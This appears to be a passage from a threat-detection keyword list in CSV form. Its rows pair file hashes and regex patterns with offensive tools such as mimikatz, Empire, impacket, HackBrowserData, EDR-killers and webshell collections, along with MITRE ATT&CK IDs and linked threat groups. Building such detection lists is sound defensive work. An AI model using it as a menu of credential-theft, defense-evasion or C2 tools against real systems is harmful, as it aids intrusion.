"*96023f92abefc6b2196bda989320836075a1fa402106fd7cc8fb546bc09502b7*",".{0,1000}96023f92abefc6b2196bda989320836075a1fa402106fd7cc8fb546bc09502b7.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31445"
"*96025a3ddc00d070b0ff8d470030b172d8308395dc127f51bdd6de6154abeef4*",".{0,1000}96025a3ddc00d070b0ff8d470030b172d8308395dc127f51bdd6de6154abeef4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31446"
"*96054c7a1c25aacb70e877dbc44a19ba6125e619d78b4c4455945d06a746181f*",".{0,1000}96054c7a1c25aacb70e877dbc44a19ba6125e619d78b4c4455945d06a746181f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31447"
"*960ad2b1c19c9d10ecd0c64f6aee01d77564ac9e48b76247a217b637c1a6d482*",".{0,1000}960ad2b1c19c9d10ecd0c64f6aee01d77564ac9e48b76247a217b637c1a6d482.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","31448"
"*960d0b51aa95a71cb471e9d217686bf7ac9b548613977d521bd477caa7a5cbf4*",".{0,1000}960d0b51aa95a71cb471e9d217686bf7ac9b548613977d521bd477caa7a5cbf4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31449"
"*961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2*",".{0,1000}961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31450"
"*9626bcb04c920c611707740eebc798ca86b03ab59480180a747fd739a1e08269*",".{0,1000}9626bcb04c920c611707740eebc798ca86b03ab59480180a747fd739a1e08269.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31453"
"*9629b04d7ab98df29ab630e392f7c15a3a3e050e4156f6ed60eb8aaf206af76e*",".{0,1000}9629b04d7ab98df29ab630e392f7c15a3a3e050e4156f6ed60eb8aaf206af76e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31454"
"*962d2a4f2088fbe103c6b38d151689ba100458978ca37a2a9b62047a029f8d33*",".{0,1000}962d2a4f2088fbe103c6b38d151689ba100458978ca37a2a9b62047a029f8d33.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31455"
"*962d6367a3b63dfb6a2db910a70650e218344a5c346beb5b8c4ca29a44d488a9*",".{0,1000}962d6367a3b63dfb6a2db910a70650e218344a5c346beb5b8c4ca29a44d488a9.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","31456"
"*963119C10E2DC7140A57BCD3456279C5AB4E9E2A3415F91E93BB5F8D8239D996*",".{0,1000}963119C10E2DC7140A57BCD3456279C5AB4E9E2A3415F91E93BB5F8D8239D996.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31457"
"*9634c75573a4d30c694112af8658cd6cac1c265ac46ff27f20baf6714c1b9428*",".{0,1000}9634c75573a4d30c694112af8658cd6cac1c265ac46ff27f20baf6714c1b9428.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31459"
"*96453b2663149a1019d5585d8a3e67961db6c6c8d43cb76756b14195a839d35e*",".{0,1000}96453b2663149a1019d5585d8a3e67961db6c6c8d43cb76756b14195a839d35e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31461"
"*964912ef45ddcef3f5dceba80676dbd4463c62fc453d4212021f84adf6e0dca3*",".{0,1000}964912ef45ddcef3f5dceba80676dbd4463c62fc453d4212021f84adf6e0dca3.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31462"
"*96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da*",".{0,1000}96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31464"
"*96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da*",".{0,1000}96632f716df30af567da00d3624e245d162d0a05ac4b4e7cbadf63f04ca8d3da.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31465"
"*96644c680528a212dff1c83615d8ca831fc21060c2dd08790bec98e6294576ee*",".{0,1000}96644c680528a212dff1c83615d8ca831fc21060c2dd08790bec98e6294576ee.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31466"
"*966526b35beca04fb98c6fe4490a79635ca5bbeef56c21fd118c95ac80ff2ddb*",".{0,1000}966526b35beca04fb98c6fe4490a79635ca5bbeef56c21fd118c95ac80ff2ddb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31467"
"*9672225f3947d30a1f5c29622c50e8bdc29b749df23450dab7f1ea3ba0f44d5d*",".{0,1000}9672225f3947d30a1f5c29622c50e8bdc29b749df23450dab7f1ea3ba0f44d5d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31468"
"*9674DF71-0814-4398-8A77-5A32A8CBE61E*",".{0,1000}9674DF71\-0814\-4398\-8A77\-5A32A8CBE61E.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#GUIDproject","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","31469"
"*9678bdc0acce5aac06e4154631a01a94bfa9c2455efb5e72c3d8cdbf2663b019*",".{0,1000}9678bdc0acce5aac06e4154631a01a94bfa9c2455efb5e72c3d8cdbf2663b019.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","31470"
"*967f010c2da33a4f2d610ec3bf7125430367e18d2f83baa18fa2b9172fd990ac*",".{0,1000}967f010c2da33a4f2d610ec3bf7125430367e18d2f83baa18fa2b9172fd990ac.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31471"
"*9680bea8301be835e4f7e35220c4dfbb48ecf51b3fb9d0405c7fa8e8abfab28e*",".{0,1000}9680bea8301be835e4f7e35220c4dfbb48ecf51b3fb9d0405c7fa8e8abfab28e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","31472"
"*9685d4a085acb3880294d902b64562841b163b4949ebab8109a92ff3257abc60*",".{0,1000}9685d4a085acb3880294d902b64562841b163b4949ebab8109a92ff3257abc60.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31474"
"*968cd73ac2f46c39aa9fa8fa638b63f6cfe07f23ffd9f39eafd1bef5bc818462*",".{0,1000}968cd73ac2f46c39aa9fa8fa638b63f6cfe07f23ffd9f39eafd1bef5bc818462.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31475"
"*968cfebad222f175df52b968f5479b7ac8f06a7bde32a47d2bada49ca09cad70*",".{0,1000}968cfebad222f175df52b968f5479b7ac8f06a7bde32a47d2bada49ca09cad70.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","31476"
"*968f17d5151addd34a19ca654a5ede75b8f6d0f079a3dd967cf2f857bfeed193*",".{0,1000}968f17d5151addd34a19ca654a5ede75b8f6d0f079a3dd967cf2f857bfeed193.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31477"
"*96920d601c95d13be934e071544eda074e9b36329e0b53735214519434aa41a0*",".{0,1000}96920d601c95d13be934e071544eda074e9b36329e0b53735214519434aa41a0.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#filehash","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","31478"
"*969402c4db5ce5946e2fb9242385a5e21328780ae6848f133172b00506706263*",".{0,1000}969402c4db5ce5946e2fb9242385a5e21328780ae6848f133172b00506706263.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31479"
"*96a355ad3176a2753b403b71f5e39c36dfb0489b621822f7da459519ed6bc4be*",".{0,1000}96a355ad3176a2753b403b71f5e39c36dfb0489b621822f7da459519ed6bc4be.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","31484"
"*96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb*",".{0,1000}96a4fbd501eb610e8183699b4fe209dcc30952e86c0fac80ea5808addc3d30cb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31485"
"*96a9a57590a8a235b89ac16face003d83198b27e6841fcd35de89f0f710a226e*",".{0,1000}96a9a57590a8a235b89ac16face003d83198b27e6841fcd35de89f0f710a226e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31486"
"*96aaf948fb2eef6f40f56164125e6dcd819e09c444f569c1a2a7df1ec0b009d7*",".{0,1000}96aaf948fb2eef6f40f56164125e6dcd819e09c444f569c1a2a7df1ec0b009d7.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","31487"
"*96b452bde52ca91033ed91f188d4c4e0eba7976a217bb474666428ba84f7cf3d*",".{0,1000}96b452bde52ca91033ed91f188d4c4e0eba7976a217bb474666428ba84f7cf3d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31490"
"*96c4151c60a745d0ad96649cd6589dd28fb8e4761de75a425965315a3aab2d62*",".{0,1000}96c4151c60a745d0ad96649cd6589dd28fb8e4761de75a425965315a3aab2d62.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","31491"
"*96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94*",".{0,1000}96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31492"
"*96c9648216ca09c9c7980f414eff4095815123f0b8404caed883c361ff77b85f*",".{0,1000}96c9648216ca09c9c7980f414eff4095815123f0b8404caed883c361ff77b85f.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","31494"
"*96cff9ea19fa5ef9e119e9b00f67d9744efa55bd15df77248201ac09050d8322*",".{0,1000}96cff9ea19fa5ef9e119e9b00f67d9744efa55bd15df77248201ac09050d8322.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31496"
"*96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e*",".{0,1000}96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31498"
"*96dbae48dbdc89b918377d94b26393e214655b42b56044402e15046d9ecccf97*",".{0,1000}96dbae48dbdc89b918377d94b26393e214655b42b56044402e15046d9ecccf97.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31499"
"*96e38545cc3afc9f9acfbe1e34537d0c8dd13c4684c60e563051fe9fe462db5e*",".{0,1000}96e38545cc3afc9f9acfbe1e34537d0c8dd13c4684c60e563051fe9fe462db5e.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31501"
"*96eefe6053e8028293510afe996aeab1c245d9c0bcf8d77f5be4cb181306a850*",".{0,1000}96eefe6053e8028293510afe996aeab1c245d9c0bcf8d77f5be4cb181306a850.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31502"
"*9708b182a7e712892b7750c50a36ffadd3983e2874269740c05650f979ede361*",".{0,1000}9708b182a7e712892b7750c50a36ffadd3983e2874269740c05650f979ede361.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31508"
"*970c07b17ca0d662ea2c5b0958efcf8e28053ee8d2a2c78436cce460413933b1*",".{0,1000}970c07b17ca0d662ea2c5b0958efcf8e28053ee8d2a2c78436cce460413933b1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31509"
"*9711738fbc89cd6b37366690193dfdd6402af920106426ff9d33aae65eaba5c8*",".{0,1000}9711738fbc89cd6b37366690193dfdd6402af920106426ff9d33aae65eaba5c8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31510"
